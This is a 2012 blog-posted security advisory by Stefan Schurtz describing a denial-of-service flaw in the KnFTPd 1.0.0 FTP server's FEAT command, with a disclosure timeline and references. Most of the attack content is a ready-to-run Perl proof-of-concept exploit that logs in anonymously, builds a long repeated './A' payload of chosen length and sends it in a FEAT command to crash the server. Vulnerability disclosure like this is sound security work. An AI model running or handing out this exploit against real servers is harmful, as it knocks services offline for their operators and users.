SSCHADV2012-011 - KnFTPd 1.0.0 'FEAT' DoS vulnerability

Posted by Stefan Schurtz on Wednesday, March 28. 2012

Advisory:	KnFTPd 1.0.0 ‘FEAT’ DoS vulnerability
Advisory ID:	SSCHADV2012-011
Author:	Stefan Schurtz
Affected Software:	Successfully tested on KnFTPd 1.0.0
Vendor URL:	http://knftp.sourceforge.net/
Vendor Status:	informed
EDB-ID:	18671

======================
Vulnerability Description
======================

The KnFTPd 1.0.0 ‘FEAT’ command is prone to DoS vulnerability

==============
PoC-Exploit
==============

#!/usr/bin/perl

            use strict;

            use Net::FTP;

            my $user = "";

            my $password = "";

            ########################

            # connect

            ########################

            my $target = $ARGV[0];

            my $plength = $ARGV[1];

            print "\n";

            print "t#######################################################\n";

            print "t# This PoC-Exploit is only for educational purpose!!! #\n";

            print "t#######################################################\n";

            print "\n";

            if (!$ARGV[0]||!$ARGV[1]) {

                    print "[+] Usage: $@ <target> <payload length>\n";

                    exit 1;

            }

            my $ftp=Net::FTP->new($target,Timeout=>12) or die "Cannot connect to $target: $@";

            print "[+] Connected to $target\n";

            ########################

            # login

            ########################

            $ftp->login($user,$password) or die "Cannot login ", $ftp->message;

            print "[+] Logged in with user $user\n";

            ###################################################

            # Building payload ‘./A’ with min. length of 94

            ##################################################

            my \@p = ( "","./A" );

            my $payload;

            print "[+] Building payload\n";

            for (my $i=1;$i<=$plength;$i++) {

                     $payload .= $p[$i];

                     push(@p,$p[$i]);

            }

            sleep(3);

            #########################################

            # Sending payload

            #########################################

            print "[+] Sending payload [$payload]\n";

            $ftp->quot(‘FEAT ‘ ."$payload");

            ##########################################

            # disconnect

            ##########################################

            print "[+] Done\n";

            $ftp->quit;

            exit 0;

            #EOF

=====
Solution
=====

-

================
Disclosure Timeline
================

28-Mar-2012 – vendor informed

====
Credits
====

Vulnerability found and advisory written by Stefan Schurtz.

=======
References
=======

http://www.darksecurity.de/advisories/2012/SSCHADV2012-011.txt

http://osvdb.org/show/osvdb/80666

Trackbacks

Trackback specific URI for this entry

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment

Name

Homepage

Comment

In reply to

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.

Enter the string from the spam-prevention image above:

Textile-formatting allowed

You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.

Form options

Remember Information?

Subscribe to this entry

Mon	Tue	Wed	Thu	Fri	Sat	Sun
← Back	April '24
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30